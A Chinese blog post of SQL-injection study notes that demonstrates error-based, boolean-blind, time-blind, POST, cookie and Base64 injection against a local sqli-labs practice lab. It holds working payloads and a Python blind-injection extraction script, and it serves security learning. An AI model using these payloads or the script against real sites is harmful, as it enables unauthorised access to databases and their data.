SQL注入(2)——各种注入

最新推荐文章于 2023-06-11 23:19:18 发布
最新推荐文章于 2023-06-11 23:19:18 发布
阅读量934 收藏 5
点赞数 5
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/realmels/article/details/116084873
版权

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法

上一篇讲了SQL手工注入及简单的检测,今天来讲解各种类型的注入。

这里配合先前搭建好的sqli-lab进行测试

报错注入

报错注入主要是通过使数据库报错,从而获取信息。
这里报错函数主要是updatexml、extractvalue
这里分别演示一下使用方法
updatexml()
在这里插入图片描述
0x7e是~的ASCII,在这里成功返回了当前数据库。

extractvalue
在这里插入图片描述
实例:http://192.168.1.9/sql1/Less-5
访问id=1,看见如下界面
在这里插入图片描述
分别输入 ’ and ‘1’='1’ and ‘1’='2,查看响应结果
’ and ‘1’='1

’ and ‘1’='2
在这里插入图片描述
发现界面发生了错误,判断存在SQL注入漏洞,但由于没有回显,所以不能用union注入,这是可以用报错注入

爆数据库:
payload:id=1’+and+updatexml(1,concat(0x7e,database(),0x7e),1)–+
在这里插入图片描述
后续步骤与union注入一致。

布尔盲注

测试页面:http://192.168.1.9/sql1/Less-8/
访问id=1,响应
在这里插入图片描述
我们分别访问 ’ and ‘1’='1’ and ‘1’='2,查看响应结果
’ and ‘1’='1
在这里插入图片描述
’ and ‘1’='2
在这里插入图片描述
发现响应了错误的请求,此时由于没有错误信息,也没有回显,我们可以用bool盲注

访问 id=1’ and length(database())>1–+,响应了正确的页面
在这里插入图片描述
再访问 id=1’ and length(database())>10–+
在这里插入图片描述
确认存在布尔盲注

接下来写一个脚本来爆出想要的信息

bool.py

import requests
url='http://192.168.1.9/sql1/Less-8/?'
payload="id=1' and ord(substr(database(),%d,1))=%d--+"
session=requests.Session()
result=''
for i in range(10):
	for j in range(97,123):
		text=session.get(url+payload%(i,j)).text
		if (len(text)!=722):
			result+=chr(j)
print(result)

这只是很简单的脚本,还有更多的改进方法
在这里插入图片描述
成功爆出了数据库名

时间盲注

这里介绍两个函数
if (expr1,expr2,expr3)
含义:如果expr1是true,则返回值为expr2,否则返回值为expr3

sleep(n)
含义:休眠n秒
这样我们就可以构造如这样的payload

id=1’ and if(length(database())>1,sleep(5),1)–+

此时,如果数据库的长度大于一,就会休眠5秒,否则就会返回直接结果

由于响应的时间非常短,我们可以用burpsuite的Repeater查看返回结果,从而判断
链接:http://192.168.1.9/sql1/Less-9/
访问 id=1,查看结果
在这里插入图片描述
分别输入 ’ and ‘1’='1’ and ‘1’='2
在这里插入图片描述
在这里插入图片描述
发现返回结果无异,此时不能用bool盲注,但可以尝试时间盲注

构造payload:id=1’ and if (length(database())>1,sleep(5),1)–+
在这里插入图片描述
发现响应时间为5秒,判断存在时间盲注

剩下步骤
与bool注入一致

POST注入

POST注入指注入点在POST参数中
测试地址:http://192.168.1.9/sql1/Less-12/
我们访问界面,会看到一个登录框
在这里插入图片描述
我们在里面输入一个双引号,发现返回了错误信息
在这里插入图片描述
告诉我们是用双引号和括号包裹起来的

利用bp抓包请求,构造payload
在这里插入图片描述
登录成功了,说明存在注入

输入 order by子句判断字段数
order by 1
在这里插入图片描述
order by 2
在这里插入图片描述
order by 3
在这里插入图片描述
页面报错,说明存在两个字段

爆数据库:
payload:uname=123") union select 1,database()–+
在这里插入图片描述
剩下步骤与union注入一致

Cookie注入

Cookie注入指注入参数在Cookie中
测试地址:http://192.168.1.9/sql1/Less-20
访问这个界面,会出现一个登陆框,在登录之后,会出现关于用户的信息
在这里插入图片描述
在这里插入图片描述
此时在bp中抓包看见cookie中有uname字段。
在这里插入图片描述
在admin后加一个单引号,发现页面报错,推测存在sql注入
在这里插入图片描述
在admin后面加上 ’ and ‘1’=‘1’–+'and ‘1’=‘2’–+
’ and ‘1’=‘1’–+
在这里插入图片描述
’and ‘1’=‘2’–+
在这里插入图片描述页面出错,存在注入漏洞

通过order by爆字段数
order by 1
在这里插入图片描述
order by 4
在这里插入图片描述

字段数为3

爆数据库:uname=a’ union select 1,2,database()–+

在这里插入图片描述
剩余步骤与union一致

Base64注入

Base64注入指在注入参数中经过了base64加密
测试地址:http://192.168.1.9/sql1/Less-21/index.php
访问页面,登录,输出了我们的信息
在这里插入图片描述
bp抓包看参数,发现uname经过了加密
在这里插入图片描述
其中,%3D是url编码,意为 = 。也就是uname的值为YWRtaW4=
放到Decoder模块进行解密,发现Base64解密的结果是admin
在这里插入图片描述
接下来构造payload,并将payload进行base64加密后发送去
payload:admin’–+
加密后:YWRtaW4nLS0r
查看发送结果
在这里插入图片描述
提示被括号包围,重新构造payload为admin’)#
加密结果:YWRtaW4nKSM=
查看请求结果
在这里插入图片描述
发现注入点
通过order by 子句获取字段数为三
构造payload爆信息
payload:a’) union select 1,2,database()#
加密结果:YScpIHVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=
响应结果在这里插入图片描述
后续步骤与union注入一致

漫路在线
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入-2
ahu0076的博客
04-20 146
SQL注入的一般步骤 1.报错:需要用单引号 双引号 或者左小括号判断字符串 被什么包裹 2.正常:闭合语句,让语句不出现语法错误 3.判断列数 : order by 关键字 4.查询想要的内容 联合查询 union 基于报错的注入方式 布尔型盲注 条件:页面存在异常情况 ,但没有回显且没有报错信息 ascii('test') 返回 ascii码 ascii码...
SQL注入2
ppbgi的博客
03-10 247
一、常见的注入方式: 报错注入: 报错思路: 使用各类函数使得数据库抛出异常或错误来获取数据的目的; 常见的报错注入: 1、extractvalue() 2、floor() 3、updataxml() 4、exp() 5、geometrycollection() 6、multipoint() 7、polygon() 8、multipolygon() 9、linestring() 10、multilinestring() 报错的原理: 1、BIGINT等数据类型的溢出 2、xpath语法
sql注入2
WYJ____的博客
08-03 349
     
简单的SQL注入2
雨九九的小窝
10-25 712
地址:http://ctf5.shiyanbar.com/web/index_2.php 参考资料:http://www.bubuko.com/infodetail-2301250.html 1.直接输入单引号,根据报错信息确定参数值类型为字符型 2.输入‘ or ‘1‘=‘1,直接报错,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入‘ ‘1‘=‘1, 仍然报错,信...
BUUCTF[第一章 web入门]SQL注入-2
hivjianxian的博客
11-22 495
ctf题解
sql注入初学——松风1
08-03
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或验证用户输入的情况下,允许攻击者向SQL查询中插入恶意代码。本文将深入探讨SQL注入的基本概念、检测方法以及针对不同数据库类型的识别技术。 ...
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
SQL注入漏洞全接触——高级篇.txt
02-13
看完入门篇和进阶篇后,稍加练习,破解...5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
SQL注入简单总结——过滤逗号注入.pdf
04-08
"SQL注入简单总结——过滤逗号注入"的主题主要探讨了如何处理那些针对逗号(`,`)进行过滤的SQL注入情况。在SQL语句中,逗号常用于分隔不同的元素,例如在`UNION`、`LIMIT`等子句中。 1. **过滤逗号的绕过方法**: ...
[第一章 web入门]SQL注入-2
最新发布
陈艺秋的博客
06-11 396
因为爆破的数据较长,而且burp爆破模块我这里不知道咋自动排序,所以可以采取导出数据存储为excel排序输出,或者用一段python代码输出。这种登录界面一般都是字符型注入,所以测试一下闭合符,没想到页面回显账号不存在。如果爆不出来,有很多429状态码的响应页时,可以考虑换网络或者降低爆破线程。但是居然没提示,我都检查了好几遍我注入的语句是否正确,最后还是看wp出来的。知道数据库长度后,我们就利用burp抓包进行爆破,按照顺序获得数据库名称。访问login.php后,是一个登录界面,直接测试注入类型。
注入SQL注入2
bwxzdjn的博客
03-19 1640
用实验案例的形式记录一些新的注入技术,如:POST注入、基于报错的注入、基于布尔的盲注和基于时间的盲注,采用手工注入的方法了解SQL注入的新的思路。
学习笔记-SQL注入-2
weixin_52501704的博客
09-15 351
SQL注入-二次注入(原理)
SQL注入2(报错型注入
嚴 帅的博客
04-25 743
SQL注入(一)https://blog.csdn.net/weixin_43997530/article/details/105627979 报错型SQL注入 我们先介绍一下报错型SQL注入,报错型sql注入sql注入(一)的前三步是一致的,但没有数据的回显位,也就是说即使构造语句成功我们也没有办法看到数据的显示。但是如果sql语句出现错误则可以显示在页面上,我们可以利用这点来构造报错显示...
CTF从零到一 SQL注入-2
shirazawah的博客
09-15 400
看到题目是一个系统,尝试输入值。 返回账号不存在。尝试输入admin 发现是有这个值的,然后就没有头绪了,查看源代码发现提示。 根据提示开启mysql错误提示,并使用burp发包。 因为是报错,所以自然想到书上的报错注入并尝试使用。 name=admin'+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_sche...
sql注入--二次注入
pakho_C的博客
01-12 1106
sql注入–二次注入 靶场:sqli-labs-master 下载链接:靶场下载链接 二次注入原理:利用新建账户中的’或者其他sql语句,在更新密码等操作时达到修改某个原特定账户的目的 第24关关键代码:pass_change.php <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); if (isset($_POST['submit'])) {
SQL注入--第二关详细讲解
MAY的博客
04-18 1012
SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
报表的SQL植入风险及规避方法
cainiao_M的博客
06-28 271
互联网时代带来方便的同时也带来了安全隐患,各种安全问题可说是防不胜防,特别是大家日益关心的个人信息等方面,貌似很难有什么安全和隐私可言。 而在报表作为常用的信息载体,更是直接面临各种安全挑战,例如:SQL 植入。 什么是 SQL 植入?! 报表为啥会有 SQL 植入风险?! 能不能通过报表工具提供的功能避免 SQL 植入?! SQL 植入的概念 首先,认识一下什么是 sql 植入? ...
数据库(DataBase)-SQL注入问题代码举例
EdwinD的博客
05-24 528
SQL注入问题 sql存在漏洞,容易导致数据泄露 本文数据库: CREATE DATABASE JdbcStudy CHARACTER SET utf8 COLLATE utf8_general_ci; USE JdbcStudy; CREATE TABLE `users`( `id` INT PRIMARY KEY, `NAME` VARCHAR(40), `PASSWORD` VARCHAR(40), `email` VARCHAR(60), `birthday` DATE ); INS

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值